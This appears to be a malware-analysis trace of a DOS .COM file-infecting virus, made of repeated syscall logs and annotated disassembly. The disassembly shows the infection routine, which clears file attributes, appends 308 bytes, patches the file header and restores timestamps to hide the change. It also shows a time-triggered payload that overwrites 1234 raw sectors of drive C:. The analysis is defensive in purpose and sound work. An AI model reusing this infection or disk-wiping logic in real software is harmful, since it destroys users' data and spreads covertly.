2018-12-25T12:27:37.267690446Z 87 PC: 12ad2 | Get or set file date and time (See above)
2018-12-25T12:27:37.27184043Z 63 PC: 12adf | Read file or device (See above)
2018-12-25T12:27:37.276496978Z 66 PC: 12aee | Move file pointer (See above)
2018-12-25T12:27:37.277969989Z 44 PC: 12af9 | Get time (See above)
2018-12-25T12:27:37.280259953Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:27:37.282418917Z 66 PC: 12b0c | Move file pointer (See above)
2018-12-25T12:27:37.283673018Z 64 PC: 12b17 | Write file or device (See above)
2018-12-25T12:27:37.287269937Z 87 PC: 12b1e | Get or set file date and time (See above)
2018-12-25T12:27:37.291334452Z 62 PC: 12b22 | Close file (See above)
2018-12-25T12:27:37.297286009Z 79 PC: 12a93 | Find next file (See above)
2018-12-25T12:27:37.300273614Z 67 PC: 12ac5 | Get or set file attributes (See above)
2018-12-25T12:27:37.312982671Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:37.323268155Z 87 PC: 12ad2 | Get or set file date and time (See above)
2018-12-25T12:27:37.325607366Z 63 PC: 12adf | Read file or device (See above)
2018-12-25T12:27:37.33297317Z 66 PC: 12aee | Move file pointer (See above)
2018-12-25T12:27:37.335105919Z 44 PC: 12af9 | Get time (See above)
2018-12-25T12:27:37.338312243Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:27:37.342657914Z 66 PC: 12b0c | Move file pointer (See above)
2018-12-25T12:27:37.344597452Z 64 PC: 12b17 | Write file or device (See above)
2018-12-25T12:27:37.347836484Z 87 PC: 12b1e | Get or set file date and time (See above)
2018-12-25T12:27:37.350862376Z 62 PC: 12b22 | Close file (See above)
2018-12-25T12:27:37.359006263Z 79 PC: 12a93 | Find next file (See above)
2018-12-25T12:27:37.362057952Z 67 PC: 12ac5 | Get or set file attributes (See above)
2018-12-25T12:27:37.373919341Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:37.38153647Z 87 PC: 12ad2 | Get or set file date and time (See above)
2018-12-25T12:27:37.383437361Z 63 PC: 12adf | Read file or device (See above)
2018-12-25T12:27:37.392006852Z 66 PC: 12aee | Move file pointer (See above)
2018-12-25T12:27:37.394367336Z 44 PC: 12af9 | Get time (See above)
2018-12-25T12:27:37.397030203Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:27:37.40645159Z 66 PC: 12b0c | Move file pointer (See above)
2018-12-25T12:27:37.409334405Z 64 PC: 12b17 | Write file or device (See above)
2018-12-25T12:27:37.417606954Z 87 PC: 12b1e | Get or set file date and time (See above)
2018-12-25T12:27:37.419733805Z 62 PC: 12b22 | Close file (See above)
2018-12-25T12:27:37.429711138Z 79 PC: 12a93 | Find next file (See above)
2018-12-25T12:27:37.432922679Z 67 PC: 12ac5 | Get or set file attributes (See above)
2018-12-25T12:27:37.443728002Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:37.452330173Z 87 PC: 12ad2 | Get or set file date and time (See above)
2018-12-25T12:27:37.454024127Z 63 PC: 12adf | Read file or device (See above)
2018-12-25T12:27:37.461670244Z 66 PC: 12aee | Move file pointer (See above)
2018-12-25T12:27:37.464314185Z 44 PC: 12af9 | Get time (See above)
2018-12-25T12:27:37.466981083Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:27:37.470221604Z 66 PC: 12b0c | Move file pointer (See above)
2018-12-25T12:27:37.472064947Z 64 PC: 12b17 | Write file or device (See above)
2018-12-25T12:27:37.475852202Z 87 PC: 12b1e | Get or set file date and time (See above)
2018-12-25T12:27:37.477637782Z 62 PC: 12b22 | Close file (See above)
2018-12-25T12:27:37.486206613Z 79 PC: 12a93 | Find next file (See above)
2018-12-25T12:27:37.490691192Z 67 PC: 12ac5 | Get or set file attributes (See above)
2018-12-25T12:27:37.502486698Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:37.510436238Z 87 PC: 12ad2 | Get or set file date and time (See above)
2018-12-25T12:27:37.513596894Z 63 PC: 12adf | Read file or device (See above)
2018-12-25T12:27:37.51705236Z 66 PC: 12aee | Move file pointer (See above)
2018-12-25T12:27:37.519177913Z 44 PC: 12af9 | Get time (See above)
2018-12-25T12:27:37.523054677Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:27:37.533344775Z 66 PC: 12b0c | Move file pointer (See above)
2018-12-25T12:27:37.535403107Z 64 PC: 12b17 | Write file or device (See above)
2018-12-25T12:27:37.543682684Z 87 PC: 12b1e | Get or set file date and time (See above)
2018-12-25T12:27:37.546743576Z 62 PC: 12b22 | Close file (See above)
2018-12-25T12:27:37.556294374Z 79 PC: 12a93 | Find next file (See above)
2018-12-25T12:27:37.559475719Z 44 PC: 12aa0 | Get time 0x12aa0: cmp dl, 2
; Viewer's disassembly window around PC 0x12aa0, where the last traced DOS
; "Get time" call (INT 21h AH=2Ch, DL = hundredths of a second) returned; the
; window's first instruction, `cmp dl, 2`, sits on the trace line just above.
; NOTE(review): the trace appears to list only INT 21h calls, so it does not
; show whether the INT 26h branch below ran in this execution.
0x12aa3: ja 0x12aae                       ; DL > 2 (unsigned): skip the disk write below
0x12aa5: mov al, 2                        ; INT 26h drive number: 0 = A:, so 2 = C:
0x12aa7: mov cx, 0x4d2                    ; sector count = 0x4d2 (1234)
0x12aaa: cdq                              ; opcode 99h is CWD in 16-bit code: DX = sign of AX; presumably 0 (first sector), AH is not shown
0x12aab: int 0x26                         ; DOS absolute disk write: raw sectors, bypassing the file system; the destructive payload
0x12aad: popf                             ; INT 26h returns with the caller's flags still on the stack; drop them
0x12aae: mov dx, 0x80                     ; DS:0080h, the default DTA inside the PSP
0x12ab1: mov ah, 0x1a                     ; INT 21h AH=1Ah: set disk transfer address
0x12ab3: int 0x21                         ; traced as "Set disk transfer address" at PC 12ab5
0x12ab5: mov di, 0x100
0x12ab8: push di
0x12ab9: ret                              ; push 0x100 / ret = jump to offset 0x100, the .COM entry point (back to the host program)
; A separate routine starts here: it opens the file named at bp+0x252.
0x12aba: lea dx, word ptr [bp + 0x252]    ; DS:DX = file name
0x12abe: mov ax, 0x4301                   ; INT 21h AX=4301h: set file attributes
0x12ac1: xor cx, cx                       ; CX = 0: clear every attribute, read-only included
0x12ac3: int 0x21
0x12ac5: mov ax, 0x3d02                   ; INT 21h AH=3Dh AL=02h: open for read/write
0x12ac8: int 0x21
0x12aca: jb 0x12b22                       ; CF set = open failed: jump to 0x12b22, shown as `ret` in the other window on this page
2018-12-25T12:27:37.563257015Z 26 PC: 12ab5 | Set disk transfer address

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":10271,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:37.267301229Z 26 PC: 12a84 | Set disk transfer address
2018-12-25T12:27:37.268932678Z 67 PC: 12ac5 | Get or set file attributes
2018-12-25T12:27:37.280295898Z 61 PC: 12aca | Open file (Filename = 'c:\dos\doskey.com')
2018-12-25T12:27:37.288181137Z 78 PC: 12a93 | Find first file
2018-12-25T12:27:37.295268585Z 67 PC: 12ac5 | Get or set file attributes (See above)
2018-12-25T12:27:37.314655536Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:37.323348293Z 87 PC: 12ad2 | Get or set file date and time
2018-12-25T12:27:37.325391204Z 63 PC: 12adf | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:27:37.33375958Z 66 PC: 12aee | Move file pointer
2018-12-25T12:27:37.335764898Z 44 PC: 12af9 | Get time 0x12af9: add dl, dh
; Viewer's disassembly window around PC 0x12af9, where the traced DOS "Get time"
; call (INT 21h AH=2Ch) returned; the window's first instruction, `add dl, dh`,
; sits on the trace line just above. This is the tail of the routine that
; modifies the .COM file opened earlier in the trace.
0x12afb: je 0x12af5                       ; ZF from `add dl, dh`: a zero sum goes back to 0x12af5 (not shown; presumably asks for the time again)
0x12afd: mov word ptr [bp + 0x10d], bx    ; store BX at bp+0x10d; what that slot holds is not visible here
0x12b01: call 0x22a4f                     ; NOTE(review): target lies past 64 KiB; presumably wraps to 0x12a4f in 16-bit code, which fits the 308-byte write traced next at PC 12a5d
0x12b04: mov ax, 0x4200                   ; INT 21h AH=42h AL=00h: move file pointer, origin = start of file
0x12b07: sub cx, cx                       ; CX = 0, high word of the offset
0x12b09: cdq                              ; opcode 99h is CWD in 16-bit code: DX = sign of AX = 0, low word of the offset
0x12b0a: int 0x21                         ; seek to offset 0
0x12b0c: mov ah, 0x40                     ; INT 21h AH=40h: write to the handle in BX
0x12b0e: mov cx, 4                        ; 4 bytes
0x12b11: lea dx, word ptr [bp + 0x22c]    ; from the buffer at bp+0x22c (contents not shown)
0x12b15: int 0x21                         ; overwrites the first 4 bytes of the file; traced as "Write 4 bytes"
0x12b17: pop dx                           ; DX and CX come off the stack; presumably the date and time
0x12b18: pop cx                           ;   saved after the earlier date/time call at PC 12ad2 (confirm)
0x12b19: mov ax, 0x5701                   ; INT 21h AX=5701h: set file date and time from CX/DX
0x12b1c: int 0x21                         ; if the originals are restored, the timestamp hides the change; compare size and content instead
0x12b1e: mov ah, 0x3e                     ; INT 21h AH=3Eh: close the handle in BX
0x12b20: int 0x21
0x12b22: ret                              ; end of the routine
0x12b23: pop bx                           ; first instruction of whatever follows; outside this routine
2018-12-25T12:27:37.338741522Z 64 PC: 12a5d | Write file or device (Write 308 bytes on handle 5)
2018-12-25T12:27:37.351574052Z 66 PC: 12b0c | Move file pointer
2018-12-25T12:27:37.353610558Z 64 PC: 12b17 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:27:37.36148455Z 87 PC: 12b1e | Get or set file date and time
2018-12-25T12:27:37.36444105Z 62 PC: 12b22 | Close file
2018-12-25T12:27:37.373596359Z 79 PC: 12a93 | Find next file (See above)
2018-12-25T12:27:37.376558709Z 67 PC: 12ac5 | Get or set file attributes (See above)
2018-12-25T12:27:37.388670063Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:37.396925518Z 87 PC: 12ad2 | Get or set file date and time (See above)
2018-12-25T12:27:37.398527167Z 63 PC: 12adf | Read file or device (See above)
2018-12-25T12:27:37.405646371Z 66 PC: 12aee | Move file pointer (See above)
2018-12-25T12:27:37.40752085Z 44 PC: 12af9 | Get time (See above)
2018-12-25T12:27:37.410234944Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:27:37.413762398Z 66 PC: 12b0c | Move file pointer (See above)
2018-12-25T12:27:37.416317886Z 64 PC: 12b17 | Write file or device (See above)
2018-12-25T12:27:37.419618914Z 87 PC: 12b1e | Get or set file date and time (See above)
2018-12-25T12:27:37.421593407Z 62 PC: 12b22 | Close file (See above)
2018-12-25T12:27:37.432647118Z 79 PC: 12a93 | Find next file (See above)
2018-12-25T12:27:37.4368519Z 67 PC: 12ac5 | Get or set file attributes (See above)
2018-12-25T12:27:37.448008946Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:37.457532529Z 87 PC: 12ad2 | Get or set file date and time (See above)
2018-12-25T12:27:37.459661673Z 63 PC: 12adf | Read file or device (See above)
2018-12-25T12:27:37.466638003Z 66 PC: 12aee | Move file pointer (See above)
2018-12-25T12:27:37.468584841Z 44 PC: 12af9 | Get time (See above)
2018-12-25T12:27:37.472107137Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:27:37.476325458Z 66 PC: 12b0c | Move file pointer (See above)
2018-12-25T12:27:37.478922138Z 64 PC: 12b17 | Write file or device (See above)
2018-12-25T12:27:37.482391243Z 87 PC: 12b1e | Get or set file date and time (See above)
2018-12-25T12:27:37.485175843Z 62 PC: 12b22 | Close file (See above)
2018-12-25T12:27:37.493604331Z 79 PC: 12a93 | Find next file (See above)
2018-12-25T12:27:37.496765479Z 67 PC: 12ac5 | Get or set file attributes (See above)
2018-12-25T12:27:37.508295074Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:37.515673716Z 87 PC: 12ad2 | Get or set file date and time (See above)
2018-12-25T12:27:37.51749151Z 63 PC: 12adf | Read file or device (See above)
2018-12-25T12:27:37.525649528Z 66 PC: 12aee | Move file pointer (See above)
2018-12-25T12:27:37.527612015Z 44 PC: 12af9 | Get time (See above)
2018-12-25T12:27:37.530505519Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:27:37.534488125Z 66 PC: 12b0c | Move file pointer (See above)
2018-12-25T12:27:37.53640863Z 64 PC: 12b17 | Write file or device (See above)
2018-12-25T12:27:37.539625077Z 87 PC: 12b1e | Get or set file date and time (See above)
2018-12-25T12:27:37.542778976Z 62 PC: 12b22 | Close file (See above)
2018-12-25T12:27:37.551471128Z 79 PC: 12a93 | Find next file (See above)
2018-12-25T12:27:37.554758884Z 67 PC: 12ac5 | Get or set file attributes (See above)
2018-12-25T12:27:37.566664931Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:37.57472196Z 87 PC: 12ad2 | Get or set file date and time (See above)
2018-12-25T12:27:37.576906307Z 63 PC: 12adf | Read file or device (See above)
2018-12-25T12:27:37.584660594Z 66 PC: 12aee | Move file pointer (See above)
2018-12-25T12:27:37.589033918Z 44 PC: 12af9 | Get time (See above)
2018-12-25T12:27:37.59211914Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:27:37.596587856Z 66 PC: 12b0c | Move file pointer (See above)
2018-12-25T12:27:37.598941888Z 64 PC: 12b17 | Write file or device (See above)
2018-12-25T12:27:37.602027226Z 87 PC: 12b1e | Get or set file date and time (See above)
2018-12-25T12:27:37.603953599Z 62 PC: 12b22 | Close file (See above)
2018-12-25T12:27:37.612893107Z 79 PC: 12a93 | Find next file (See above)
2018-12-25T12:27:37.616270838Z 67 PC: 12ac5 | Get or set file attributes (See above)
2018-12-25T12:27:37.627092888Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:37.635345918Z 87 PC: 12ad2 | Get or set file date and time (See above)
2018-12-25T12:27:37.637205545Z 63 PC: 12adf | Read file or device (See above)
2018-12-25T12:27:37.644521794Z 66 PC: 12aee | Move file pointer (See above)
2018-12-25T12:27:37.64677564Z 44 PC: 12af9 | Get time (See above)
2018-12-25T12:27:37.649467119Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:27:37.659360262Z 66 PC: 12b0c | Move file pointer (See above)
2018-12-25T12:27:37.662683279Z 64 PC: 12b17 | Write file or device (See above)
2018-12-25T12:27:37.67134259Z 87 PC: 12b1e | Get or set file date and time (See above)
2018-12-25T12:27:37.673533056Z 62 PC: 12b22 | Close file (See above)
2018-12-25T12:27:37.682742623Z 79 PC: 12a93 | Find next file (See above)
2018-12-25T12:27:37.687212158Z 67 PC: 12ac5 | Get or set file attributes (See above)
2018-12-25T12:27:37.698381292Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:37.705862183Z 87 PC: 12ad2 | Get or set file date and time (See above)
2018-12-25T12:27:37.708536884Z 63 PC: 12adf | Read file or device (See above)
2018-12-25T12:27:37.715615138Z 66 PC: 12aee | Move file pointer (See above)
2018-12-25T12:27:37.717437732Z 44 PC: 12af9 | Get time (See above)
2018-12-25T12:27:37.720972031Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:27:37.724654772Z 66 PC: 12b0c | Move file pointer (See above)
2018-12-25T12:27:37.726434291Z 64 PC: 12b17 | Write file or device (See above)
2018-12-25T12:27:37.730541673Z 87 PC: 12b1e | Get or set file date and time (See above)
2018-12-25T12:27:37.733251927Z 62 PC: 12b22 | Close file (See above)
2018-12-25T12:27:37.741497996Z 79 PC: 12a93 | Find next file (See above)
2018-12-25T12:27:37.744614126Z 67 PC: 12ac5 | Get or set file attributes (See above)
2018-12-25T12:27:37.756173292Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:37.763472109Z 87 PC: 12ad2 | Get or set file date and time (See above)
2018-12-25T12:27:37.765222732Z 63 PC: 12adf | Read file or device (See above)
2018-12-25T12:27:37.769104816Z 66 PC: 12aee | Move file pointer (See above)
2018-12-25T12:27:37.771319865Z 44 PC: 12af9 | Get time (See above)
2018-12-25T12:27:37.774169113Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:27:37.783990812Z 66 PC: 12b0c | Move file pointer (See above)
2018-12-25T12:27:37.786078233Z 64 PC: 12b17 | Write file or device (See above)
2018-12-25T12:27:37.793422496Z 87 PC: 12b1e | Get or set file date and time (See above)
2018-12-25T12:27:37.796365062Z 62 PC: 12b22 | Close file (See above)
2018-12-25T12:27:37.805867218Z 79 PC: 12a93 | Find next file (See above)
2018-12-25T12:27:37.808722615Z 44 PC: 12aa0 | Get time 0x12aa0: cmp dl, 2
; Viewer's disassembly window around PC 0x12aa0, where the last traced DOS
; "Get time" call (INT 21h AH=2Ch, DL = hundredths of a second) returned; the
; window's first instruction, `cmp dl, 2`, sits on the trace line just above.
; NOTE(review): the trace appears to list only INT 21h calls, so it does not
; show whether the INT 26h branch below ran in this execution.
0x12aa3: ja 0x12aae                       ; DL > 2 (unsigned): skip the disk write below
0x12aa5: mov al, 2                        ; INT 26h drive number: 0 = A:, so 2 = C:
0x12aa7: mov cx, 0x4d2                    ; sector count = 0x4d2 (1234)
0x12aaa: cdq                              ; opcode 99h is CWD in 16-bit code: DX = sign of AX; presumably 0 (first sector), AH is not shown
0x12aab: int 0x26                         ; DOS absolute disk write: raw sectors, bypassing the file system; the destructive payload
0x12aad: popf                             ; INT 26h returns with the caller's flags still on the stack; drop them
0x12aae: mov dx, 0x80                     ; DS:0080h, the default DTA inside the PSP
0x12ab1: mov ah, 0x1a                     ; INT 21h AH=1Ah: set disk transfer address
0x12ab3: int 0x21                         ; traced as "Set disk transfer address" at PC 12ab5
0x12ab5: mov di, 0x100
0x12ab8: push di
0x12ab9: ret                              ; push 0x100 / ret = jump to offset 0x100, the .COM entry point (back to the host program)
; A separate routine starts here: it opens the file named at bp+0x252.
0x12aba: lea dx, word ptr [bp + 0x252]    ; DS:DX = file name
0x12abe: mov ax, 0x4301                   ; INT 21h AX=4301h: set file attributes
0x12ac1: xor cx, cx                       ; CX = 0: clear every attribute, read-only included
0x12ac3: int 0x21
0x12ac5: mov ax, 0x3d02                   ; INT 21h AH=3Dh AL=02h: open for read/write
0x12ac8: int 0x21
0x12aca: jb 0x12b22                       ; CF set = open failed: jump to 0x12b22, shown as `ret` in the other window on this page
2018-12-25T12:27:37.811328089Z 26 PC: 12ab5 | Set disk transfer address